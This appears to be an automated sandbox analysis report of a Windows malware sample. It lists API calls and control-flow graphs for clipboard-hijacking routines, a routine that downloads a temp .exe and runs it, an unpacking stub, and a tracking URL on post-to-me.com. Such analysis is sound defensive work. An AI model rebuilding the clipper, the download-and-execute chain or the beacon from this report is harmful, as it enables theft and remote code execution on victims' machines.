API calls 64475->64476 64479 431f45 SetLastError 64475->64479 64478 431f08 64476->64478 64484 431f10 64478->64484 64509 435167 11 API calls 2 library calls 64478->64509 64479->64462 64481 43346a _free 20 API calls 64483 431f16 64481->64483 64482 431f25 64482->64484 64485 431f2c 64482->64485 64486 431f51 SetLastError 64483->64486 64484->64481 64510 431d4c 20 API calls __Toupper 64485->64510 64511 42df7d 167 API calls 2 library calls 64486->64511 64489 431f37 64491 43346a _free 20 API calls 64489->64491 64490 431f5d 64492 431f3e 64491->64492 64492->64479 64492->64486 64494 435596 64493->64494 64495 43558c 64493->64495 64512 434e93 5 API calls 2 library calls 64494->64512 64497 40f8cf __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 64495->64497 64498 42dff0 64497->64498 64498->64465 64507 4354a4 10 API calls 2 library calls 64498->64507 64499 4355ad 64499->64495 64513 405800 64500->64513 64526 40155a Sleep 64500->64526 64501 401173 64504 42e199 64501->64504 64705 42e074 64504->64705 64506 42e1a6 64507->64465 64508->64475 64509->64482 64510->64489 64511->64490 64512->64499 64514 40580c Concurrency::details::SchedulerBase::SchedulerBase 64513->64514 64515 4010ea std::_Cnd_initX 35 API calls 64514->64515 64516 405821 __Cnd_signal 64515->64516 64517 405839 64516->64517 64572 40ce32 28 API calls std::_Throw_Cpp_error 64516->64572 64519 401109 std::_Cnd_initX 28 API calls 64517->64519 64520 405842 64519->64520 64528 4029f4 InternetOpenW 64520->64528 64544 4016df 64520->64544 64523 405849 messages Concurrency::details::SchedulerBase::SchedulerBase 64523->64501 64527 4016d5 64526->64527 64529 402a27 InternetOpenUrlW 64528->64529 64531 402b9c 64528->64531 64530 402a3d GetTempPathW GetTempFileNameW 64529->64530 64529->64531 64573 42a88e 64530->64573 64533 40f8cf __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 64531->64533 64535 402bab 64533->64535 64565 40e76b 64535->64565 64536 402b8b InternetCloseHandle InternetCloseHandle 64536->64531 64537 402aa8 ListArray 64538 402ac0 InternetReadFile WriteFile 64537->64538 64539 402b00 CloseHandle 64537->64539 64538->64537 64575 402960 64539->64575 64542 402b2b ShellExecuteExW 64542->64536 64543 402b72 WaitForSingleObject CloseHandle 64542->64543 64543->64536 64683 40fde6 64544->64683 64546 4016eb Sleep 64684 40cc10 64546->64684 64549 40cc10 28 API calls 64550 401711 64549->64550 64551 40171b OpenClipboard 64550->64551 64552 401943 Sleep 64551->64552 64553 40172b GetClipboardData 64551->64553 64552->64551 64554 40173b GlobalLock 64553->64554 64555 40193d CloseClipboard 64553->64555 64554->64555 64559 401748 _strlen 64554->64559 64555->64552 64556 40cbc7 28 API calls std::system_error::system_error 64556->64559 64557 40cc10 28 API calls 64557->64559 64559->64555 64559->64556 64559->64557 64560 4018d2 EmptyClipboard GlobalAlloc 64559->64560 64688 402e66 167 API calls 2 library calls 64559->64688 64690 40caa6 26 API calls _Deallocate 64559->64690 64560->64559 64561 4018eb GlobalLock 64560->64561 64689 426990 64561->64689 64564 401905 GlobalUnlock SetClipboardData GlobalFree 64564->64559 64696 40deea 64565->64696 64570 40e810 64570->64523 64571 40e782 __Cnd_do_broadcast_at_thread_exit __Mtx_unlock __Cnd_broadcast 64703 40def6 LeaveCriticalSection std::_Lockit::~_Lockit 64571->64703 64572->64517 64574 402a76 CreateFileW 64573->64574 64574->64536 64574->64537 64576 40298b ListArray _wcslen 64575->64576 64585 42b454 64576->64585 64580 4029b8 64607 404333 64580->64607 64583 40f8cf __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 64584 4029f2 64583->64584 64584->64536 64584->64542 64611 42b106 64585->64611 64588 402823 64589 402832 Concurrency::details::SchedulerBase::SchedulerBase 64588->64589 64637 4032dd 64589->64637 64591 402846 64653 403b8b 64591->64653 64593 40285a 64594 402888 64593->64594 64595 40286c 64593->64595 64659 403112 64594->64659 64680 40329a 167 API calls 64595->64680 64598 402895 64662 403c20 64598->64662 64600 4028a7 64672 403cc2 64600->64672 64602 40287f std::ios_base::_Ios_base_dtor Concurrency::details::SchedulerBase::SchedulerBase 64602->64580 64603 4028c4 64604 404333 26 API calls 64603->64604 64605 4028e3 64604->64605 64681 40329a 167 API calls 64605->64681 64608 4029e4 64607->64608 64609 40433b 64607->64609 64608->64583 64682 40cc96 26 API calls 2 library calls 64609->64682 64612 42b133 64611->64612 64613 42b137 64612->64613 64614 42b142 64612->64614 64615 42b15a 64612->64615 64618 40f8cf __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 64613->64618 64616 42eac9 __Wcrtomb 20 API calls 64614->64616 64617 42a747 __fassign 162 API calls 64615->64617 64619 42b147 64616->64619 64620 42b165 64617->64620 64621 4029a4 64618->64621 64622 42a59d _Atexit 26 API calls 64619->64622 64623 42b170 64620->64623 64624 42b307 64620->64624 64621->64588 64622->64613 64626 42b218 WideCharToMultiByte 64623->64626 64628 42b17b 64623->64628 64634 42b1b5 WideCharToMultiByte 64623->64634 64625 42b334 WideCharToMultiByte 64624->64625 64632 42b312 64624->64632 64625->64632 64626->64628 64629 42b243 64626->64629 64628->64613 64633 42eac9 __Wcrtomb 20 API calls 64628->64633 64629->64628 64631 42b24c GetLastError 64629->64631 64630 42eac9 __Wcrtomb 20 API calls 64630->64613 64631->64628 64636 42b25b 64631->64636 64632->64613 64632->64630 64633->64613 64634->64628 64635 42b274 WideCharToMultiByte 64635->64632 64635->64636 64636->64613 64636->64632 64636->64635 64638 4032e9 Concurrency::details::SchedulerBase::SchedulerBase 64637->64638 64639 40467c 167 API calls 64638->64639 64640 403315 64639->64640 64641 40484d 167 API calls 64640->64641 64642 40333e 64641->64642 64643 40458c 26 API calls 64642->64643 64644 40334d 64643->64644 64645 403392 std::ios_base::_Ios_base_dtor 64644->64645 64646 40dde3 167 API calls 64644->64646 64647 4033ce Concurrency::details::SchedulerBase::SchedulerBase 64645->64647 64649 40c618 167 API calls 64645->64649 64648 403362 64646->64648 64647->64591 64648->64645 64650 40458c 26 API calls 64648->64650 64649->64647 64651 403373 64650->64651 64652 404c14 167 API calls 64651->64652 64652->64645 64654 403b97 Concurrency::details::SchedulerBase::SchedulerBase 64653->64654 64655 4042af 167 API calls 64654->64655 64656 403ba3 64655->64656 64657 403bc7 Concurrency::details::SchedulerBase::SchedulerBase 64656->64657 64658 4034fb 167 API calls 64656->64658 64657->64593 64658->64657 64660 404356 28 API calls 64659->64660 64661 40312c ListArray 64660->64661 64661->64598 64663 403c2c Concurrency::details::SchedulerBase::SchedulerBase 64662->64663 64664 40c618 167 API calls 64663->64664 64665 403c4f 64664->64665 64666 4042af 167 API calls 64665->64666 64667 403c59 64666->64667 64669 403c9c Concurrency::details::SchedulerBase::SchedulerBase 64667->64669 64671 4034fb 167 API calls 64667->64671 64668 403c7a 64668->64669 64670 4046ca 167 API calls 64668->64670 64669->64600 64670->64669 64671->64668 64673 403cce __EH_prolog3_catch 64672->64673 64674 4042af 167 API calls 64673->64674 64676 403ce7 64674->64676 64675 4046ca 167 API calls 64677 403d70 Concurrency::details::SchedulerBase::SchedulerBase 64675->64677 64678 403d17 64676->64678 64679 40369f 40 API calls 64676->64679 64677->64603 64678->64675 64679->64678 64680->64602 64681->64602 64682->64608 64683->64546 64685 40cc2c _strlen 64684->64685 64691 40cbc7 64685->64691 64687 401704 64687->64549 64688->64559 64689->64564 64690->64559 64692 40cbfa 64691->64692 64693 40cbd6 BuildCatchObjectHelperInternal 64691->64693 64692->64693 64695 40cb5c 28 API calls 4 library calls 64692->64695 64693->64687 64695->64693 64704 40f22a EnterCriticalSection 64696->64704 64698 40def4 64699 40ce99 GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 64698->64699 64700 40ced2 64699->64700 64701 40cec7 CloseHandle 64699->64701 64702 40ced6 GetCurrentThreadId 64700->64702 64701->64702 64702->64571 64703->64570 64704->64698 64714 431f5e GetLastError 64705->64714 64707 42e083 ExitThread 64708 42e0a1 64711 42e0b4 64708->64711 64712 42e0ad CloseHandle 64708->64712 64711->64707 64713 42e0c0 FreeLibraryAndExitThread 64711->64713 64712->64711 64715 431f7d 64714->64715 64716 431f77 64714->64716 64718 434d2a __Toupper 17 API calls 64715->64718 64720 431fd4 SetLastError 64715->64720 64734 435111 11 API calls 2 library calls 64716->64734 64719 431f8f 64718->64719 64721 431f97 64719->64721 64735 435167 11 API calls 2 library calls 64719->64735 64722 42e07f 64720->64722 64724 43346a _free 17 API calls 64721->64724 64722->64707 64722->64708 64733 4354f6 10 API calls 2 library calls 64722->64733 64726 431f9d 64724->64726 64725 431fac 64725->64721 64727 431fb3 64725->64727 64729 431fcb SetLastError 64726->64729 64736 431d4c 20 API calls __Toupper 64727->64736 64729->64722 64730 431fbe 64731 43346a _free 17 API calls 64730->64731 64732 431fc4 64731->64732 64732->64720 64732->64729 64733->64708 64734->64715 64735->64725 64736->64730 64737->64387 64738 40239e 64739 402561 PostQuitMessage 64738->64739 64740 4023b2 64738->64740 64741 40255f 64739->64741 64742 4023b9 DefWindowProcW 64740->64742 64743 4023d0 64740->64743 64742->64741 64743->64741 64744 4029f4 167 API calls 64743->64744 64744->64741

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 004016E6
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00001541,0000004C), ref: 004016F0
                                                                                                                                                                                                                                                                  • Part of subcall function 0040CC10: _strlen.LIBCMT ref: 0040CC27
                                                                                                                                                                                                                                                                • OpenClipboard.USER32(00000000), ref: 0040171D
                                                                                                                                                                                                                                                                • GetClipboardData.USER32(00000001), ref: 0040172D
                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0040173C
                                                                                                                                                                                                                                                                • _strlen.LIBCMT ref: 00401749
                                                                                                                                                                                                                                                                • _strlen.LIBCMT ref: 00401778
                                                                                                                                                                                                                                                                • _strlen.LIBCMT ref: 004018BC
                                                                                                                                                                                                                                                                • EmptyClipboard.USER32 ref: 004018D2
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004018FD
                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00401909
                                                                                                                                                                                                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 00401912
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00401919
                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 0040193D
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(000002D2), ref: 00401948
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                                                                                                                                                                                                • String ID: i
                                                                                                                                                                                                                                                                • API String ID: 1583243082-3865851505
                                                                                                                                                                                                                                                                • Opcode ID: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
                                                                                                                                                                                                                                                                • Instruction ID: e3fffec023ebc7079252f179b6fac15abd8ab57f1bda789313b6278f228a63c7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 26510531C00384DAE7119B64EC567AD7774FF29306F04523AE805721B3EB789A85C75D

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A17
                                                                                                                                                                                                                                                                • InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00402A2D
                                                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(00000105,?), ref: 00402A49
                                                                                                                                                                                                                                                                • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A5F
                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A98
                                                                                                                                                                                                                                                                • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AD4
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AF1
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00402B07
                                                                                                                                                                                                                                                                • ShellExecuteExW.SHELL32(?), ref: 00402B68
                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B7D
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00402B89
                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00402B92
                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00402B95
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                                                                                                                                                                                                • String ID: .exe$<$ShareScreen
                                                                                                                                                                                                                                                                • API String ID: 3323492106-493228180
                                                                                                                                                                                                                                                                • Opcode ID: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
                                                                                                                                                                                                                                                                • Instruction ID: e60cee4ce2238679e1fb1751da2f8ba8583e6b9327599976f3985bfb1b161874
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4741437190021CAFEB209F649D85FEAB7BCFF05745F0081F6A549E2190DEB49E858FA4
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 009BB38E
                                                                                                                                                                                                                                                                • Module32First.KERNEL32(00000000,00000224), ref: 009BB3AE
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215370096.00000000009BA000.00000040.00000020.00020000.00000000.sdmp, Offset: 009BA000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_9ba000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3833638111-0
                                                                                                                                                                                                                                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                • Instruction ID: 9e840caec8a7504e119a2d6f07ae012fd3e736b3d9d35c7d6130964cedf3a1cd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62F062315017156BD7203AF59D8DBAE76ECEF49735F100628E642910C0DBB1EC458A61

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 74 43d03c-43d06c call 43cd9f 77 43d087-43d093 call 43977e 74->77 78 43d06e-43d079 call 42eab6 74->78 84 43d095-43d0aa call 42eab6 call 42eac9 77->84 85 43d0ac-43d0f5 call 43cd0a 77->85 83 43d07b-43d082 call 42eac9 78->83 94 43d35e-43d364 83->94 84->83 92 43d162-43d16b GetFileType 85->92 93 43d0f7-43d100 85->93 98 43d1b4-43d1b7 92->98 99 43d16d-43d19e GetLastError call 42ea93 CloseHandle 92->99 96 43d102-43d106 93->96 97 43d137-43d15d GetLastError call 42ea93 93->97 96->97 103 43d108-43d135 call 43cd0a 96->103 97->83 101 43d1c0-43d1c6 98->101 102 43d1b9-43d1be 98->102 99->83 113 43d1a4-43d1af call 42eac9 99->113 106 43d1ca-43d218 call 4396c7 101->106 107 43d1c8 101->107 102->106 103->92 103->97 117 43d21a-43d226 call 43cf1b 106->117 118 43d228-43d24c call 43cabd 106->118 107->106 113->83 117->118 123 43d250-43d25a call 4335cd 117->123 124 43d25f-43d2a2 118->124 125 43d24e 118->125 123->94 127 43d2c3-43d2d1 124->127 128 43d2a4-43d2a8 124->128 125->123 131 43d2d7-43d2db 127->131 132 43d35c 127->132 128->127 130 43d2aa-43d2be 128->130 130->127 131->132 133 43d2dd-43d310 CloseHandle call 43cd0a 131->133 132->94 136 43d312-43d33e GetLastError call 42ea93 call 439890 133->136 137 43d344-43d358 133->137 136->137 137->132
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 0043CD0A: CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0043D150
                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 0043D157
                                                                                                                                                                                                                                                                • GetFileType.KERNEL32(00000000), ref: 0043D163
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0043D16D
                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 0043D176
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0043D196
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0043D2E0
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0043D312
                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 0043D319
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                • String ID: H
                                                                                                                                                                                                                                                                • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                                                • Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                                                                                                                                                                                                • Instruction ID: 375b4e16163f674ce9da34a4ad13212d62ba31a6b33a52f993f1a67b08af40b6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ACA13632E101149FCF19AF68EC517AE7BA1AF0A324F14115EF8159B391D6389D02CB5A

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 142 432f29-432f39 143 432f53-432f55 142->143 144 432f3b-432f4e call 42eab6 call 42eac9 142->144 146 432f5b-432f61 143->146 147 4332bd-4332ca call 42eab6 call 42eac9 143->147 158 4332d5 144->158 146->147 150 432f67-432f92 146->150 165 4332d0 call 42a59d 147->165 150->147 153 432f98-432fa1 150->153 156 432fa3-432fb6 call 42eab6 call 42eac9 153->156 157 432fbb-432fbd 153->157 156->165 161 432fc3-432fc7 157->161 162 4332b9-4332bb 157->162 164 4332d8-4332dd 158->164 161->162 163 432fcd-432fd1 161->163 162->164 163->156 167 432fd3-432fea 163->167 165->158 170 433007-433010 167->170 171 432fec-432fef 167->171 175 433012-433029 call 42eab6 call 42eac9 call 42a59d 170->175 176 43302e-433038 170->176 173 432ff1-432ff7 171->173 174 432ff9-433002 171->174 173->174 173->175 177 4330a3-4330bd 174->177 207 4331f0 175->207 179 43303a-43303c 176->179 180 43303f-43305d call 4336a7 call 43346a * 2 176->180 183 4330c3-4330d3 177->183 184 433191-43319a call 43d365 177->184 179->180 211 43307a-4330a0 call 4347ee 180->211 212 43305f-433075 call 42eac9 call 42eab6 180->212 183->184 185 4330d9-4330db 183->185 196 43320d 184->196 197 43319c-4331ae 184->197 185->184 189 4330e1-433107 185->189 189->184 193 43310d-433120 189->193 193->184 198 433122-433124 193->198 200 433211-433229 ReadFile 196->200 197->196 202 4331b0-4331bf GetConsoleMode 197->202 198->184 203 433126-433151 198->203 205 433285-433290 GetLastError 200->205 206 43322b-433231 200->206 202->196 208 4331c1-4331c5 202->208 203->184 210 433153-433166 203->210 213 433292-4332a4 call 42eac9 call 42eab6 205->213 214 4332a9-4332ac 205->214 206->205 215 433233 206->215 209 4331f3-4331fd call 43346a 207->209 208->200 216 4331c7-4331e1 ReadConsoleW 208->216 209->164 210->184 220 433168-43316a 210->220 211->177 212->207 213->207 217 4332b2-4332b4 214->217 218 4331e9-4331ef call 42ea93 214->218 224 433236-433248 215->224 225 4331e3 GetLastError 216->225 226 433202-43320b 216->226 217->209 218->207 220->184 229 43316c-43318c 220->229 224->209 233 43324a-43324e 224->233 225->218 226->224 229->184 237 433250-433260 call 432c45 233->237 238 433267-433272 233->238 247 433263-433265 237->247 239 433274 call 432d95 238->239 240 43327e-433283 call 432a85 238->240 248 433279-43327c 239->248 240->248 247->209 248->247
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                                                                                                                                                                                                • Instruction ID: e6f917e7e92ba8bfc6e6230e9bcbcb6957f35208d34794f9861c257e27c575d5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44C11670E04345AFDF11DFAAD841BAEBBB0BF0D305F14119AE815A7392C7389A41CB69

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 250 248003c-2480047 251 2480049 250->251 252 248004c-2480263 call 2480a3f call 2480e0f call 2480d90 VirtualAlloc 250->252 251->252 267 248028b-2480292 252->267 268 2480265-2480289 call 2480a69 252->268 270 24802a1-24802b0 267->270 272 24802ce-24803c2 VirtualProtect call 2480cce call 2480ce7 268->272 270->272 273 24802b2-24802cc 270->273 279 24803d1-24803e0 272->279 273->270 280 2480439-24804b8 VirtualFree 279->280 281 24803e2-2480437 call 2480ce7 279->281 283 24804be-24804cd 280->283 284 24805f4-24805fe 280->284 281->279 286 24804d3-24804dd 283->286 287 248077f-2480789 284->287 288 2480604-248060d 284->288 286->284 292 24804e3-2480505 LoadLibraryA 286->292 290 248078b-24807a3 287->290 291 24807a6-24807b0 287->291 288->287 293 2480613-2480637 288->293 290->291 294 248086e-24808be LoadLibraryA 291->294 295 24807b6-24807cb 291->295 296 2480517-2480520 292->296 297 2480507-2480515 292->297 298 248063e-2480648 293->298 302 24808c7-24808f9 294->302 299 24807d2-24807d5 295->299 300 2480526-2480547 296->300 297->300 298->287 301 248064e-248065a 298->301 303 2480824-2480833 299->303 304 24807d7-24807e0 299->304 305 248054d-2480550 300->305 301->287 306 2480660-248066a 301->306 309 24808fb-2480901 302->309 310 2480902-248091d 302->310 308 2480839-248083c 303->308 311 24807e2 304->311 312 24807e4-2480822 304->312 313 24805e0-24805ef 305->313 314 2480556-248056b 305->314 307 248067a-2480689 306->307 317 248068f-24806b2 307->317 318 2480750-248077a 307->318 308->294 319 248083e-2480847 308->319 309->310 311->303 312->299 313->286 315 248056d 314->315 316 248056f-248057a 314->316 315->313 320 248059b-24805bb 316->320 321 248057c-2480599 316->321 322 24806ef-24806fc 317->322 323 24806b4-24806ed 317->323 318->298 324 2480849 319->324 325 248084b-248086c 319->325 333 24805bd-24805db 320->333 321->333 327 248074b 322->327 328 24806fe-2480748 322->328 323->322 324->294 325->308 327->307 328->327 333->305
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0248024D
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                                • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                                • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                • Instruction ID: 7b1ad8852e436fc1817e3e2aa783fdc326378ef2b8c29df7ba1e42edb9faaceb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B527A74A11229DFDB64CF58C984BADBBB1BF09304F1480DAE50DAB351DB30AA89CF14

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C27
                                                                                                                                                                                                                                                                  • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                                                                                                                                                                                                  • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                                                                                                                                                                                                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E3A
                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00402E4B
                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00402E4E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Internet$CloseHandleOpen_wcslen
                                                                                                                                                                                                                                                                • String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
                                                                                                                                                                                                                                                                • API String ID: 3067768807-1501832161
                                                                                                                                                                                                                                                                • Opcode ID: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
                                                                                                                                                                                                                                                                • Instruction ID: 610146e9b537463af15e95cb977131b409bd75c1d6f6ac837d2bfbf99fd09ca4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 95515295E65344A9E320EFB0BC46B762378EF58712F10643BE518CB2F2E7B09944875E

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
